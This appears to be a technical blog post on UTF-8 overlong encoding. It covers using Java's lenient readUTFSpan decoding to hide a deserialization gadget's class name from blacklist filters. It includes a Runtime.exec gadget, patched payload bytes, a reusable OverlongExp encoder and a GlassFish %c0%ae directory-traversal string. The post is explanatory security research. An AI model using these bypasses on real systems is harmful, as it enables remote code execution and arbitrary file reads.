UTF-8 Overlong Encoding · zIxyd's Blog

Preface:

Notes on the security issues caused by UTF-8 Overlong Encoding.

References: the write-ups by 1ue and lzstar.

UTF-8

UTF-8 is a variable-length encoding. It represents a symbol with 1 to 4 bytes, and the byte length depends on the symbol.

UTF-8 encoding rules:

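For a single-byte symbol, the first bit of the byte is 0 and the remaining 7 bits hold the symbol's Unicode code point. For English letters, the UTF-8 encoding is therefore identical to ASCII.
For an n-byte symbol (n > 1), the first n bits of the first byte are all 1, bit n + 1 is 0, and every following byte starts with 10. All the remaining bits are filled with the symbol's Unicode code point.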
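
The rules above can be sketched in a few lines of Python. This is only an illustration, not a complete codec: `utf8_encode` is a hypothetical helper name, and it assumes a valid code point (no surrogate or range checks). The result is compared against Python's built-in `str.encode`.

```python
def utf8_encode(code_point: int) -> bytes:
    """Encode one code point following the rules above (hypothetical helper)."""
    if code_point < 0x80:
        # 1 byte: 0xxxxxxx
        return bytes([code_point])
    if code_point < 0x800:
        # 2 bytes: 110xxxxx 10xxxxxx
        return bytes([0xC0 | (code_point >> 6),
                      0x80 | (code_point & 0x3F)])
    if code_point < 0x10000:
        # 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (code_point >> 12),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    # 4 bytes: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
    return bytes([0xF0 | (code_point >> 18),
                  0x80 | ((code_point >> 12) & 0x3F),
                  0x80 | ((code_point >> 6) & 0x3F),
                  0x80 | (code_point & 0x3F)])


if __name__ == "__main__":
    # One sample per byte length: U+006F, U+00E9, U+4E2D, U+1F600.
    for cp in (0x6F, 0xE9, 0x4E2D, 0x1F600):
        encoded = utf8_encode(cp)
        assert encoded == chr(cp).encode("utf-8")
        print(f"U+{cp:04X}", encoded.hex())
```

The shortest form is the only valid one in standard UTF-8; an overlong encoding deliberately picks a longer row of this table for a small code point.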

Analysis

Suppose there is a malicious class like the following:

package org.zIxyd;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class Calc implements Serializable {

    private String cmd;

    public Calc() {
    }

    public Calc(String cmd) {
        this.cmd = cmd;
    }


    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        Runtime.getRuntime().exec(this.cmd);
    }
}

If some piece of code can deserialize this class, the result is arbitrary command execution:

package org.zIxyd;
import java.io.*;

public class ExpTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        Calc calc = new Calc("calc");

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
        oos.writeObject(calc);

        String string = byteArrayOutputStream.toString();
        System.out.println(string);

        BytetoHex(byteArrayOutputStream.toByteArray());

        // Blacklist check
        if (!string.contains("org.zIxyd.Calc")) {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
            ois.readObject();
        }else{
            System.out.println("Hacker!!!");
        }
    }

    public static void BytetoHex(byte[] bytes){
        StringBuilder hexString = new StringBuilder();
        for (byte b : bytes) {
            hexString.append(String.format("%02X", b));
        }
        System.out.println(hexString.toString());
    }
}

/*
Output:
�� sr org.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
ACED00057372000E6F72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63
Hacker!!!
*/

However, this code sits behind a WAF-style check: !string.contains("org.zIxyd.Calc");

As the output shows, normally serialized data contains the class name in plain form.
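
To make that concrete, here is a small Python sketch that pulls the class name out of the start of the hex dump printed above. It assumes the layout seen in this particular dump (2-byte magic, 2-byte version, TC_OBJECT 0x73, TC_CLASSDESC 0x72, then a 2-byte length followed by the name bytes); `read_class_name` is a hypothetical helper, not a general stream parser.

```python
import struct

# The first 22 bytes of the hex dump printed by ExpTest above.
SERIALIZED_PREFIX_HEX = "ACED00057372000E6F72672E7A497879642E43616C63"


def read_class_name(data: bytes) -> bytes:
    """Return the raw class-name bytes of the first class descriptor."""
    magic, version, tc_object, tc_classdesc = struct.unpack_from(">HHBB", data, 0)
    if magic != 0xACED or version != 5:
        raise ValueError("not a Java serialization stream")
    if tc_object != 0x73 or tc_classdesc != 0x72:
        raise ValueError("stream does not start with an object and class descriptor")
    # The class name is stored as a 2-byte big-endian length plus that many bytes.
    (length,) = struct.unpack_from(">H", data, 6)
    return data[8:8 + length]


if __name__ == "__main__":
    print(read_class_name(bytes.fromhex(SERIALIZED_PREFIX_HEX)))
```

The length field here is 0x000E (14), which matches the 14 ASCII bytes of org.zIxyd.Calc.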

Next, debug the deserialization to see how the class name is read. 1ue has already given the call stack:

ObjectStreamClass#readNonProxy(ObjectInputStream in)
	ObjectInputStream#readUTF()
		BlockDataInputStream#readUTF()
			ObjectInputStream#readUTFBody(long utflen)
				ObjectInputStream#readUTFSpan(StringBuilder sbuf, long utflen)

The chain ends at the readUTFSpan method in ObjectInputStream (defined in its inner class BlockDataInputStream):

private long readUTFSpan(StringBuilder sbuf, long utflen)
      throws IOException
  {
      int cpos = 0;
      int start = pos;
      int avail = Math.min(end - pos, CHAR_BUF_SIZE);
      // stop short of last char unless all of utf bytes in buffer
      int stop = pos + ((utflen > avail) ? avail - 2 : (int) utflen);
      boolean outOfBounds = false;

      try {
          while (pos < stop) {
              int b1, b2, b3;
              b1 = buf[pos++] & 0xFF;
              switch (b1 >> 4) {
                  case 0:
                  case 1:
                  case 2:
                  case 3:
                  case 4:
                  case 5:
                  case 6:
                  case 7:   // 1 byte format: 0xxxxxxx
                      cbuf[cpos++] = (char) b1;
                      break;

                  case 12:
                  case 13:  // 2 byte format: 110xxxxx 10xxxxxx
                      b2 = buf[pos++];
                      if ((b2 & 0xC0) != 0x80) {
                          throw new UTFDataFormatException();
                      }
                      cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
                                             ((b2 & 0x3F) << 0));
                      break;

                  case 14:  // 3 byte format: 1110xxxx 10xxxxxx 10xxxxxx
                      b3 = buf[pos + 1];
                      b2 = buf[pos + 0];
                      pos += 2;
                      if ((b2 & 0xC0) != 0x80 || (b3 & 0xC0) != 0x80) {
                          throw new UTFDataFormatException();
                      }
                      cbuf[cpos++] = (char) (((b1 & 0x0F) << 12) |
                                             ((b2 & 0x3F) << 6) |
                                             ((b3 & 0x3F) << 0));
                      break;

                  default:  // 10xx xxxx, 1111 xxxx
                      throw new UTFDataFormatException();
              }
          }
      } catch (ArrayIndexOutOfBoundsException ex) {
          outOfBounds = true;
      } finally {
          if (outOfBounds || (pos - start) > utflen) {
              pos = start + (int) utflen;
              throw new UTFDataFormatException();
          }
      }

      sbuf.append(cbuf, 0, cpos);
      return pos - start;
  }

Here switch (b1 >> 4) looks at the high four bits of the first byte to decide how many bytes make up one character.

My class name here is org.zIxyd.Calc. Its first character is o, which is 0x6f in hex.

Following the code, 0x6f >> 4 is 6, so execution lands in the one-byte-per-character branch, which returns the char o:

case 7:   // 1 byte format: 0xxxxxxx
    cbuf[cpos++] = (char) b1;
    break;

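But is the 1 byte format (0xxxxxxx) the only way to get the character o? Not at all. Neither the two-byte branch nor the three-byte branch checks that the decoded value actually needs that many bytes, so both can return o as well: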

case 12:
case 13:  // 2 byte format: 110xxxxx 10xxxxxx
    b2 = buf[pos++];
    if ((b2 & 0xC0) != 0x80) {
        throw new UTFDataFormatException();
    }
    cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
                           ((b2 & 0x3F) << 0));
    break;

Take the two-byte case as an example. The Python script below prints the two byte values that decode to each letter:

import string

b1 = int("11000000", 2)
while (b1 <= int("11011111", 2)):
    b2 = int("10000000", 2)
    while (b2 <= int("10111111", 2)):
        cha = chr(((b1 & 0x1F) << 6) | ((b2 & 0x3F) << 0))
        if (cha in string.ascii_lowercase):
            print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
        if (cha in string.ascii_uppercase):
            print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
        b2 = b2 + 1
    b1 = b1 + 1

From the output we get: o 0xc1 : 0xaf
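
As a cross-check, here is a rough Python port of the switch in readUTFSpan. It is a simplified sketch (the name `decode_like_read_utf_span` is made up, and the buffer handling of the Java method is left out), but the three branches use the same masks and shifts, so it shows that the one-, two- and three-byte forms all decode to the same character.

```python
def decode_like_read_utf_span(data: bytes) -> str:
    """Decode bytes with the same branch logic as readUTFSpan (no overlong check)."""
    chars = []
    pos = 0
    while pos < len(data):
        b1 = data[pos]
        pos += 1
        kind = b1 >> 4
        if kind <= 7:
            # 1 byte format: 0xxxxxxx
            chars.append(chr(b1))
        elif kind in (12, 13):
            # 2 byte format: 110xxxxx 10xxxxxx
            b2 = data[pos]
            pos += 1
            if (b2 & 0xC0) != 0x80:
                raise ValueError("malformed 2-byte sequence")
            chars.append(chr(((b1 & 0x1F) << 6) | (b2 & 0x3F)))
        elif kind == 14:
            # 3 byte format: 1110xxxx 10xxxxxx 10xxxxxx
            b2, b3 = data[pos], data[pos + 1]
            pos += 2
            if (b2 & 0xC0) != 0x80 or (b3 & 0xC0) != 0x80:
                raise ValueError("malformed 3-byte sequence")
            chars.append(chr(((b1 & 0x0F) << 12) | ((b2 & 0x3F) << 6) | (b3 & 0x3F)))
        else:
            # 10xxxxxx or 1111xxxx as a first byte is rejected, as in the Java code.
            raise ValueError("unsupported leading byte")
    return "".join(chars)


if __name__ == "__main__":
    for encoded in (b"\x6f", b"\xc1\xaf", b"\xe0\x81\xaf"):
        print(encoded.hex(), "->", decode_like_read_utf_span(encoded))
```

For 0xc1 0xaf the arithmetic is ((0xc1 & 0x1F) << 6) | (0xaf & 0x3F) = 64 + 47 = 0x6f, which is o.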

Now take the hex of the malicious serialized data from before, change 6F to C1AF, and deserialize it again.

Note that the class name is now one byte longer, so its length field has to change as well (000E becomes 000F).
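
The manual patch can also be scripted. The sketch below works on the hex dump from ExpTest and assumes the same layout as that dump (length field at offset 6, name at offset 8) and an ASCII first character; `overlong_first_char` is a hypothetical helper name.

```python
import struct

# Hex dump printed by ExpTest above, split only for readability.
ORIGINAL_HEX = (
    "ACED00057372000E6F72672E7A497879642E43616C63"
    "BCF254BC9C48297C0200014C0003636D64"
    "7400124C6A6176612F6C616E672F537472696E673B"
    "787074000463616C63"
)


def overlong_first_char(data: bytes) -> bytes:
    """Re-encode the first class-name byte as two bytes and fix the length field."""
    (length,) = struct.unpack_from(">H", data, 6)
    name = data[8:8 + length]
    first = name[0]  # assumed to be ASCII (< 0x80)
    overlong = bytes([0xC0 | (first >> 6), 0x80 | (first & 0x3F)])
    new_name = overlong + name[1:]
    # Header, updated length, patched name, then the untouched rest of the stream.
    return data[:6] + struct.pack(">H", len(new_name)) + new_name + data[8 + length:]


if __name__ == "__main__":
    patched = overlong_first_char(bytes.fromhex(ORIGINAL_HEX))
    print(patched.hex().upper())
```

The printed hex starts with ACED00057372000FC1AF, the same bytes as the hand-edited string used in the Java test that follows.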

package org.zIxyd;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class CalcTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {

        // Length changed from 000E to 000F; the leading 6F ('o') replaced by C1AF.
        String hexString = "ACED00057372000FC1AF72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63";
        // The local helper is used for decoding; javax.xml.bind is no longer bundled with JDK 11+.
        byte[] bytes = hexStringToByteArray(hexString);
        String text = new String(bytes);

        System.out.println("Converted string: " + text);
        // Blacklist check
        if (!text.contains("org.zIxyd.Calc")) {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
            ois.readObject();
        } else {
            System.out.println("Hacker!!!");
        }
    }


    // Convert a hex string (two digits per byte) into a byte array.
    public static byte[] hexStringToByteArray(String hexString) {
        int len = hexString.length();
        byte[] data = new byte[len / 2];
        for (int i = 0; i < len; i += 2) {
            data[i / 2] = (byte) ((Character.digit(hexString.charAt(i), 16) << 4)
                    + Character.digit(hexString.charAt(i + 1), 16));
        }
        return data;
    }
}

/*

Output:
Converted string: �� sr ��rg.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
*/

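As you can see, the character o has been obfuscated, so the string no longer contains org.zIxyd.Calc and the blacklist is bypassed.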
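
The mismatch between the filter and the deserializer can be reproduced in Python. This is a sketch under one assumption: Python's `errors="replace"` decoding stands in for what `new String(bytes)` does with malformed UTF-8 (both substitute U+FFFD, which is what the output above shows). `blacklist_hit` is a made-up name that mimics the check in CalcTest.

```python
# Start of the original and of the patched stream (header, length, class name).
ORIGINAL_PREFIX = bytes.fromhex("ACED00057372000E6F72672E7A497879642E43616C63")
PATCHED_PREFIX = bytes.fromhex("ACED00057372000FC1AF72672E7A497879642E43616C63")


def blacklist_hit(data: bytes) -> bool:
    """Mimic the naive filter: decode leniently, then search for the class name."""
    text = data.decode("utf-8", errors="replace")
    return "org.zIxyd.Calc" in text


if __name__ == "__main__":
    print(blacklist_hit(ORIGINAL_PREFIX))   # the plain class name is found
    print(blacklist_hit(PATCHED_PREFIX))    # C1 AF is not decoded to 'o' by a strict decoder
    # A strict decoder refuses the overlong bytes outright.
    try:
        b"\xc1\xaf".decode("utf-8")
    except UnicodeDecodeError as exc:
        print("strict decode failed:", exc.reason)
```

The filter inspects the raw bytes with a strict decoder, while readUTFSpan decodes them leniently. A check placed after the JVM has decoded the name (for example in a resolveClass override) would see org.zIxyd.Calc again.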

Tools

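That completes the analysis. Editing the class-name bytes by hand is far too tedious, though. The approach most people use is to override the writeClassDescriptor method and add logic that overlong-encodes the class name (see lzstar's write-up for the details).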

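Reading the comments, I then saw a suggestion that overriding writeUTF is simpler by comparison (it really is a lot simpler), which led to the code below: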

import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.HashMap;

public class OverlongExp extends ObjectOutputStream {

    private static HashMap<Character, int[]> map;
    static {
        map = new HashMap<>();
        map.put('.', new int[]{0xc0, 0xae});
        map.put(';', new int[]{0xc0, 0xbb});
        map.put('$', new int[]{0xc0, 0xa4});
        map.put('[', new int[]{0xc1, 0x9b});
        map.put(']', new int[]{0xc1, 0x9d});
        map.put('_', new int[]{0xc1, 0x9f});
        map.put('a', new int[]{0xc1, 0xa1});
        map.put('b', new int[]{0xc1, 0xa2});
        map.put('c', new int[]{0xc1, 0xa3});
        map.put('d', new int[]{0xc1, 0xa4});
        map.put('e', new int[]{0xc1, 0xa5});
        map.put('f', new int[]{0xc1, 0xa6});
        map.put('g', new int[]{0xc1, 0xa7});
        map.put('h', new int[]{0xc1, 0xa8});
        map.put('i', new int[]{0xc1, 0xa9});
        map.put('j', new int[]{0xc1, 0xaa});
        map.put('k', new int[]{0xc1, 0xab});
        map.put('l', new int[]{0xc1, 0xac});
        map.put('m', new int[]{0xc1, 0xad});
        map.put('n', new int[]{0xc1, 0xae});
        map.put('o', new int[]{0xc1, 0xaf});
        map.put('p', new int[]{0xc1, 0xb0});
        map.put('q', new int[]{0xc1, 0xb1});
        map.put('r', new int[]{0xc1, 0xb2});
        map.put('s', new int[]{0xc1, 0xb3});
        map.put('t', new int[]{0xc1, 0xb4});
        map.put('u', new int[]{0xc1, 0xb5});
        map.put('v', new int[]{0xc1, 0xb6});
        map.put('w', new int[]{0xc1, 0xb7});
        map.put('x', new int[]{0xc1, 0xb8});
        map.put('y', new int[]{0xc1, 0xb9});
        map.put('z', new int[]{0xc1, 0xba});
        map.put('A', new int[]{0xc1, 0x81});
        map.put('B', new int[]{0xc1, 0x82});
        map.put('C', new int[]{0xc1, 0x83});
        map.put('D', new int[]{0xc1, 0x84});
        map.put('E', new int[]{0xc1, 0x85});
        map.put('F', new int[]{0xc1, 0x86});
        map.put('G', new int[]{0xc1, 0x87});
        map.put('H', new int[]{0xc1, 0x88});
        map.put('I', new int[]{0xc1, 0x89});
        map.put('J', new int[]{0xc1, 0x8a});
        map.put('K', new int[]{0xc1, 0x8b});
        map.put('L', new int[]{0xc1, 0x8c});
        map.put('M', new int[]{0xc1, 0x8d});
        map.put('N', new int[]{0xc1, 0x8e});
        map.put('O', new int[]{0xc1, 0x8f});
        map.put('P', new int[]{0xc1, 0x90});
        map.put('Q', new int[]{0xc1, 0x91});
        map.put('R', new int[]{0xc1, 0x92});
        map.put('S', new int[]{0xc1, 0x93});
        map.put('T', new int[]{0xc1, 0x94});
        map.put('U', new int[]{0xc1, 0x95});
        map.put('V', new int[]{0xc1, 0x96});
        map.put('W', new int[]{0xc1, 0x97});
        map.put('X', new int[]{0xc1, 0x98});
        map.put('Y', new int[]{0xc1, 0x99});
        map.put('Z', new int[]{0xc1, 0x9a});
    }

    public OverlongExp(OutputStream out) throws IOException {
        super(out);
    }

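    @Override
    public void writeUTF(String str) throws IOException {
        // Strings with non-ASCII characters keep the default encoding.
        for (int i = 0; i < str.length(); i++) {
            if (str.charAt(i) >= 0x80) {
                super.writeUTF(str);
                return;
            }
        }

        // Every character is written as two bytes, so the byte length doubles.
        writeShort(str.length() * 2);
        for (int i = 0; i < str.length(); i++) {
            char c = str.charAt(i);
            int[] bs = map.get(c);
            if (bs == null) {
                // Characters missing from the table (digits, '/', ...) would
                // otherwise cause a NullPointerException; compute them instead.
                bs = new int[]{0xc0 | (c >> 6), 0x80 | (c & 0x3f)};
            }
            super.write(bs[0]);
            super.write(bs[1]);
        }
    }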
}

Compare the CC5 payload before and after obfuscation.

Summary

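The security issues caused by Overlong Encoding are not limited to Java deserialization. For example, GlassFish did not account for UTF-8 Overlong Encoding attacks when decoding URLs, so %c0%ae was parsed as the ASCII character . (dot). An attacker can use %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ to walk up the directory tree, which gives directory traversal and arbitrary file read.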
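
The URL case can be illustrated with a small Python sketch. It does not reproduce GlassFish's actual decoder; `lenient_decode` is a made-up function that, like the vulnerable behaviour described above, accepts two-byte sequences without checking for overlong forms. Only `urllib.parse.unquote_to_bytes` is a real library call here.

```python
from urllib.parse import unquote_to_bytes


def lenient_decode(data: bytes) -> str:
    """Decode 1- and 2-byte sequences without rejecting overlong forms (illustrative only)."""
    out = []
    i = 0
    while i < len(data):
        b1 = data[i]
        if b1 < 0x80:
            out.append(chr(b1))
            i += 1
        elif 0xC0 <= b1 <= 0xDF and i + 1 < len(data) and (data[i + 1] & 0xC0) == 0x80:
            out.append(chr(((b1 & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("byte sequence not handled by this sketch")
    return "".join(out)


if __name__ == "__main__":
    raw = unquote_to_bytes("%c0%ae%c0%ae/%c0%ae%c0%ae/")
    print(raw)                  # percent-decoding alone leaves the C0 AE bytes
    print(lenient_decode(raw))  # the lenient decoder turns them into dots
    try:
        raw.decode("utf-8")     # a strict decoder rejects the input
    except UnicodeDecodeError:
        print("rejected by strict UTF-8 decoding")
```

A path filter that looks for ../ before decoding never sees the dots, while the lenient decoder produces them afterwards.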

Finally, here is a simple Python function written by p神 that converts an ASCII string into overlong-encoded UTF-8:

def convert_int(i: int) -> bytes:
    b1 = ((i >> 6) & 0b11111) | 0b11000000
    b2 = (i & 0b111111) | 0b10000000
    return bytes([b1, b2])


def convert_str(s: str) -> bytes:
    bs = b''
    for ch in s.encode():
        bs += convert_int(ch)

    return bs


if __name__ == '__main__':
    print(convert_str('.')) # b'\xc0\xae'
    print(convert_str('org.example.Evil'))
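
Since the three-byte branch of readUTFSpan shown earlier does not check for overlong forms either, the same idea can be extended to three bytes per character. The sketch below is my own variation on the function above, not part of p神's code; the names `convert_int_3byte` and `convert_str_3byte` are made up, and it assumes ASCII-only input.

```python
def convert_int_3byte(i: int) -> bytes:
    """Encode a value below 0x80 as an overlong 3-byte sequence: 1110xxxx 10xxxxxx 10xxxxxx."""
    b1 = 0b11100000 | ((i >> 12) & 0b1111)
    b2 = 0b10000000 | ((i >> 6) & 0b111111)
    b3 = 0b10000000 | (i & 0b111111)
    return bytes([b1, b2, b3])


def convert_str_3byte(s: str) -> bytes:
    """Overlong-encode every character of an ASCII string with three bytes each."""
    return b"".join(convert_int_3byte(ch) for ch in s.encode("ascii"))


if __name__ == "__main__":
    print(convert_str_3byte("."))
    print(convert_str_3byte("org.example.Evil"))
```

When such bytes are written into a serialized stream, the length field has to be three times the character count instead of two.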